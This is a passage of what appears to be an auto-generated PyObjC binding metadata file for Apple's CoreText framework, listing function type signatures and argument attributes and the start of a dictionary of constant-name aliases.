'null_accepted': True}}}), 'CTFontCollectionCopyQueryDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterCreateLine': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontDescriptors': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontGetDescent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCreateWithFontDescriptor': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetAttributes': (b'^{__CFDictionary=}^{__CTRun=}',), 'CTFontCopySupportedLanguages': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyVariationAxes': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetLocation': (b'd^{__CTTextTab=}',), 'CTFontCopyPostScriptName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyDefaultCascadeListForLanguages': (b'^{__CFArray=}^{__CTFont=}^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetVerticalTranslationsForGlyphs': (sel32or64(b'v^{__CTFont=}^S^{_NSSize=ff}l', b'v^{__CTFont=}^S^{CGSize=dd}q'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptorsWithOptions': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFramesetterCreateWithAttributedString': (b'^{__CTFramesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreatePathForGlyph': (sel32or64(b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=ffffff}', b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFrameDraw': (b'v^{__CTFrame=}^{CGContext=}',), 'CTFontCollectionCopyExclusionDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetBaseAdvancesAndOrigins': (b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}^{CGPoint=dd}', '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}, 3: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontManagerGetAutoActivationSetting': (b'I^{__CFString=}',), 'CTFontGetOpticalBoundsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}lL', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}^S^{CGRect={CGPoint=dd}{CGSize=dd}}qQ'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontManagerUnregisterFontDescriptors': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontDescriptorCopyAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithFontDescriptorAndOptions': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontGetMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTFont=}', b'{CGAffineTransform=dddddd}^{__CTFont=}'),), 'CTFontGetSymbolicTraits': (b'I^{__CTFont=}',), 'CTFontCreateCopyWithAttributes': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetSizeFactor': (sel32or64(b'f^{__CTRubyAnnotation=}', b'd^{__CTRubyAnnotation=}'),), 'CTFontCollectionCopyFontAttribute': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFamilyName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetTypeID': (sel32or64(b'L', b'Q'),), 'CTParagraphStyleCreate': (sel32or64(b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=II^v}L', b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=IQ^v}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {0: {'c_array_length_in_arg': 1, 'type_modifier': 'n'}}}), 'CTRunGetImageBounds': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTFontManagerIsSupportedFont': (b'B^{__CFURL=}',), 'CTRunGetAdvancesPtr': (sel32or64(b'^{CGSize=ff}^{__CTRun=}', b'^{CGSize=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTRunGetStatus': (b'I^{__CTRun=}',), 'CTGlyphInfoGetCharacterIdentifier': (b'S^{__CTGlyphInfo=}',), 'CTFontGetUnitsPerEm': (b'I^{__CTFont=}',), 'CTFontCopyVariation': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetFrameAttributes': (b'^{__CFDictionary=}^{__CTFrame=}',), 'CTFramesetterCreateWithTypesetter': (b'@@', '', {'retval': {'already_cfretained': True}}), 'CTTextTabCreate': (b'^{__CTTextTab=}Cd^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetExclusionDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFrameGetPath': (b'^{CGPath=}^{__CTFrame=}',), 'CTFontManagerCopyRegisteredFontDescriptors': (b'^{__CFArray=}IB', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFramesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateFromAvailableFonts': (b'^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphsPtr': (b'r^S^{__CTRun=}', '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontDrawGlyphs': (sel32or64(b'v^{__CTFont=}^S^{CGPoint=ff}L^{CGContext=}', b'v^{__CTFont=}^S^{CGPoint=dd}Q^{CGContext=}'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}}}), 'CTFontGetGlyphCount': (sel32or64(b'l^{__CTFont=}', b'q^{__CTFont=}'),), 'CTFontManagerCreateFontDescriptorFromData': (b'^{__CTFontDescriptor=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetCharacterCollection': (b'S^{__CTGlyphInfo=}',), 'CTFontCopyAttribute': (b'@^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetBoundingRectsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}I^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}l', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}I^S^{CGRect={CGPoint=dd}{CGSize=dd}}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTFontGetBoundingBox': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}'),), 'CTFontManagerSetAutoActivationSetting': (b'v^{__CFString=}I',), 'CTTypesetterCreateWithAttributedStringAndOptions': (b'^{__CTTypesetter=}^{__CFAttributedString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetImageBounds': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}^{CGContext=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}^{CGContext=}'),), 'CTFontCopyDisplayName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGetCoreTextVersion': (b'I',), 'CTParagraphStyleCreateCopy': (b'^{__CTParagraphStyle=}^{__CTParagraphStyle=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetAdvancesForGlyphs': (sel32or64(b'd^{__CTFont=}I^S^{_NSSize=ff}l', b'd^{__CTFont=}I^S^{CGSize=dd}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTTextTabGetOptions': (b'^{__CFDictionary=}^{__CTTextTab=}',), 'CTGlyphInfoCreateWithGlyph': (b'^{__CTGlyphInfo=}S^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithPlatformFont': (sel32or64(b'^{__CTFont=}Lf^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}Id^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontCreateForStringWithLanguage': (b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTRubyAnnotationCreateCopy': (b'^{__CTRubyAnnotation=}^{__CTRubyAnnotation=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTRunGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRubyAnnotationGetTextForPosition': (b'^{__CFString=}^{__CTRubyAnnotation=}C',), 'CTLineGetTypographicBounds': (sel32or64(b'd^{__CTLine=}^f^f^f', b'd^{__CTLine=}^d^d^d'), '', {'arguments': {1: {'type_modifier': 'o'}, 2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}}}), 'CTFontGetPlatformFont': (sel32or64(b'L^{__CTFont=}^^{__CTFontDescriptor}', b'I^{__CTFont=}^^{__CTFontDescriptor}'), '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTLineGetTrailingWhitespaceWidth': (b'd^{__CTLine=}',), 'CTFontManagerRegisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontCopyTable': (sel32or64(b'^{__CFData=}^{__CTFont=}LI', b'^{__CFData=}^{__CTFont=}II'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestLineBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTGlyphInfoCreateWithCharacterIdentifier': (b'^{__CTGlyphInfo=}SS^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyCharacterSet': (b'^{__CFCharacterSet=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetStringEncoding': (sel32or64(b'L^{__CTFont=}', b'I^{__CTFont=}'),), 'CTRunGetStringIndices': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^l', b'v^{__CTRun=}{_CFRange=qq}^q'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTRunGetAdvances': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSSize=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsSortedWithCallback': (b'^{__CFArray=}^{__CTFontCollection=}^?@', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'i'}, 'arguments': {0: {'type': b'^{__CTFontDescriptor=}'}, 1: {'type': b'^{__CTFontDescriptor=}'}, 2: {'type': b'@'}}}, 'callable_retained': False}}}), 'CTFontCopyFullName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTParagraphStyleGetValueForSpecifier': (sel32or64(b'B^{__CTParagraphStyle=}IL^v', b'B^{__CTParagraphStyle=}IQ^v'), '', {'arguments': {3: {'c_array_length_in_arg': 2, 'type_modifier': 'o'}}}), 'CTLineGetOffsetForStringIndex': (sel32or64(b'f^{__CTLine=}l^f', b'd^{__CTLine=}q^d'), '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontManagerEnableFontDescriptors': (b'v^{__CFArray=}B',), 'CTRubyAnnotationGetAlignment': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyLocalizedName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithFamily': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerGetScopeForURL': (b'I^{__CFURL=}',), 'CTFontGetSize': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCollectionGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontGetGlyphWithName': (b'S^{__CTFont=}^{__CFString=}',), 'CTLineGetGlyphRuns': (b'^{__CFArray=}^{__CTLine=}',), 'CTFontCreateWithNameAndOptions': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontDescriptorCreateCopyWithAttributes': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetCapHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontGetUnderlineThickness': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerCopyAvailableFontURLs': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFeatureSettings': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateMatchingFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetGlyphCount': (sel32or64(b'l^{__CTLine=}', b'q^{__CTLine=}'),), 'CTLineDraw': (b'v^{__CTLine=}^{CGContext=}',), 'CTFontDescriptorCreateCopyWithFeature': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}^{__CFNumber=}', '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetTypeID': (sel32or64(b'L', b'Q'),), 'CTTypesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetTextMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTRun=}', b'{CGAffineTransform=dddddd}^{__CTRun=}'),), 'CTFontGetLigatureCaretPositions': (sel32or64(b'l^{__CTFont=}S^fl', b'q^{__CTFont=}S^dq'), '', {'arguments': {2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMutableCopy': (b'^{__CTFontCollection=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithNameAndSize': (sel32or64(b'^{__CTFontDescriptor=}^{__CFString=}f', b'^{__CTFontDescriptor=}^{__CFString=}d'), '', {'retval': {'already_cfretained': True}}), 'CTLineGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTLine=}', b'{_CFRange=qq}^{__CTLine=}'),), 'CTFontManagerCopyAvailablePostScriptNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetRefCon': (b'^v^{__CTRunDelegate=}',), 'CTLineCreateJustifiedLine': (sel32or64(b'^{__CTLine=}^{__CTLine=}fd', b'^{__CTLine=}^{__CTLine=}dd'), '', {'retval': {'already_cfretained': True}}), 'CTFrameGetLines': (b'^{__CFArray=}^{__CTFrame=}',), 'CTFontCollectionCreateCopyWithFontDescriptors': (b'^{__CTFontCollection=}^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphCount': (sel32or64(b'l^{__CTRun=}', b'q^{__CTRun=}'),), 'CTFontDescriptorCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetQueryDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFontDescriptorCopyLocalizedAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFrameGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFrameGetLineOrigins': (sel32or64(b'v^{__CTFrame=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTFrame=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCreateWithName': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFramesetterGetTypesetter': (b'^{__CTTypesetter=}^{__CTFramesetter=}',), 'CTGlyphInfoCreateWithGlyphName': (b'^{__CTGlyphInfo=}^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateCopyWithSymbolicTraits': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}II', '', {'retval': {'already_cfretained': True}}), 'CTLineGetBoundsWithOptions': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}L', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}Q'),), 'CTFontCopyGraphicsFont': (b'^{CGFont=}^{__CTFont=}^^{__CTFontDescriptor}', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsForFamily': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetXHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetPositions': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithVariation': (sel32or64(b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}f', b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithAttributes': (b'^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerUnregisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontCreateCopyWithSymbolicTraits': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}II', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}II'), '', {'retval': {'already_cfretained': True}}), 'CTFontCopyTraits': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDraw': (sel32or64(b'v^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'v^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTLineGetStringIndexForPosition': (sel32or64(b'l^{__CTLine=}{CGPoint=ff}', b'q^{__CTLine=}{CGPoint=dd}'),), 'CTFontDescriptorCopyAttributes': (b'^{__CFDictionary=}^{__CTFontDescriptor=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetLeading': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetGlyphs': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^S', b'v^{__CTRun=}{_CFRange=qq}^S'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateWithFontDescriptors': (b'^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateCreate': (sel32or64(b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=l^?^?^?^?}^v', b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=q^?^?^?^?}^v'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterCreateLineWithOffset': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}d', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetUnderlinePosition': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetTypographicBounds': (sel32or64(b'd^{__CTRun=}{_CFRange=ll}^f^f^f', b'd^{__CTRun=}{_CFRange=qq}^d^d^d'), '', {'arguments': {2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}, 4: {'type_modifier': 'o'}}}), 'CTTypesetterCreateWithAttributedString': (b'^{__CTTypesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateWithAttributedString': (b'^{__CTLine=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetAlignment': (b'C^{__CTTextTab=}',), 'CTFontCopyName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetSlantAngle': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFramesetterSuggestFrameSizeWithConstraints': (sel32or64(b'{CGSize=ff}^{__CTTypesetter=}{_CFRange=ll}@{CGSize=ff}^{_CFRange=ll}', b'{CGSize=dd}^{__CTTypesetter=}{_CFRange=qq}@{CGSize=dd}^{_CFRange=qq}'), '', {'arguments': {4: {'type_modifier': 'o'}}}), 'CTFontCollectionCopyFontAttributes': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFSet=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTRubyAnnotationGetOverhang': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyFeatures': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateForString': (sel32or64(b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=ll}', b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetGlyphName': (b'^{__CFString=}^{__CTGlyphInfo=}',), 'CTParagraphStyleGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCreateUIFontForLanguage': (sel32or64(b'^{__CTFont=}If^{__CFString=}', b'^{__CTFont=}Id^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCopyAvailableFontFamilyNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetVisibleStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFontManagerRegisterFontsWithAssetNames': (b'v^{__CFArray=}^{__CFBundle=}IB@?', '', {'arguments': {4: {'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTLineGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetPositionsPtr': (sel32or64(b'r^{_NSPoint=ff}^{__CTRun=}', b'r^{CGPoint=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}})} aliases = {'kCTFontItalicTrait': 'kCTFontTraitItalic', 'kCTFontMessageFontType': 'kCTFontUIFontMessage', 'kCTNaturalTextAlignment': 'kCTTextAlignmentNatural', 'kCTFontDefaultOrientation': 'kCTFontOrientationDefault', 'kCTFontVerticalTrait': 'kCTFontTraitVertical', 'kFontChineseScript': 'kFontTraditionalChineseScript', 'kCTFontToolbarFontType': 'kCTFontUIFontToolbar', 'kCTFontClarendonSerifsClass': 'kCTFontClassClarendonSerifs', 'kCTFontCondensedTrait': 'kCTFontTraitCondensed', 'kCTIdentityMappingCharacterCollection': 'kCTCharacterCollectionIdentityMapping', 'kFontEthiopicScript': 'kFontGeezScript', 'kCTFontEmphasizedSystemFontType': 'kCTFontUIFontEmphasizedSystem', 'kCTFontSlabSerifsClass': 'kCTFontClassSlabSerifs', 'CT_AVAILABLE_BUT_DEPRECATED': '__OSX_AVAILABLE_BUT_DEPRECATED', 'CT_AVAILABLE_STARTING': '__OSX_AVAILABLE_STARTING', 'kCTFontVerticalOrientation': 'kCTFontOrientationVertical', 'kCTFontEmphasizedSystemDetailFontType': 'kCTFontUIFontEmphasizedSystemDetail', 'kCTFontWindowTitleFontType': 'kCTFontUIFontWindowTitle', 'kCTFontOldStyleSerifsClass': 'kCTFontClassOldStyleSerifs', 'kCTFontExpandedTrait': 'kCTFontTraitExpanded', 'kCTAdobeGB1CharacterCollection': 'kCTCharacterCollectionAdobeGB1', 'kCTFontUtilityWindowTitleFontType': 'kCTFontUIFontUtilityWindowTitle', 'kCTFontColorGlyphsTrait': 'kCTFontTraitColorGlyphs', 'kCTFontUserFontType': 'kCTFontUIFontUser', 'kCTFontModernSerifsClass': 'kCTFontClassModernSerifs', 'kCTFontMiniEmphasizedSystemFontType': 'kCTFontUIFontMiniEmphasizedSystem', 'kCTFontApplicationFontType': 'kCTFontUIFontApplication', 'CT_DEPRECATED_ENUMERATOR': '__CT_DEPRECATED_ENUMERATOR', 'kCTFontScriptsClass': 'kCTFontClassScripts', 'kCTFontFreeformSerifsClass': 'kCTFontClassFreeformSerifs', 'kCTFontMiniSystemFontType': 'kCTFontUIFontMiniSystem', 'kCTFontSystemDetailFontType': 'kCTFontUIFontSystemDetail', 'kCTFontManagerScopeUser': 'kCTFontManagerScopePersistent', 'kCTFontMenuItemMarkFontType': 'kCTFontUIFontMenuItemMark', 'kFontSindhiScript': 'kFontExtendedArabicScript', 'kCTRunDelegateCurrentVersion': 'kCTRunDelegateVersion1', 'kCTFontOrnamentalsClass': 'kCTFontClassOrnamentals', 'kCTFontPaletteFontType': 'kCTFontUIFontPalette', 'kCTFontControlContentFontType': 'kCTFontUIFontControlContent', 'kCTFontMenuTitleFontType': 'kCTFontUIFontMenuTitle', 'kFontRussian': 'kFontCyrillicScript', 'kCTFontToolTipFontType': 'kCTFontUIFontToolTip', 'kCTFontTransitionalSerifsClass': 'kCTFontClassTransitionalSerifs', 'kCTFontLabelFontType': 'kCTFontUIFontLabel', 'kCTLeftTextAlignment': 'kCTTextAlignmentLeft', 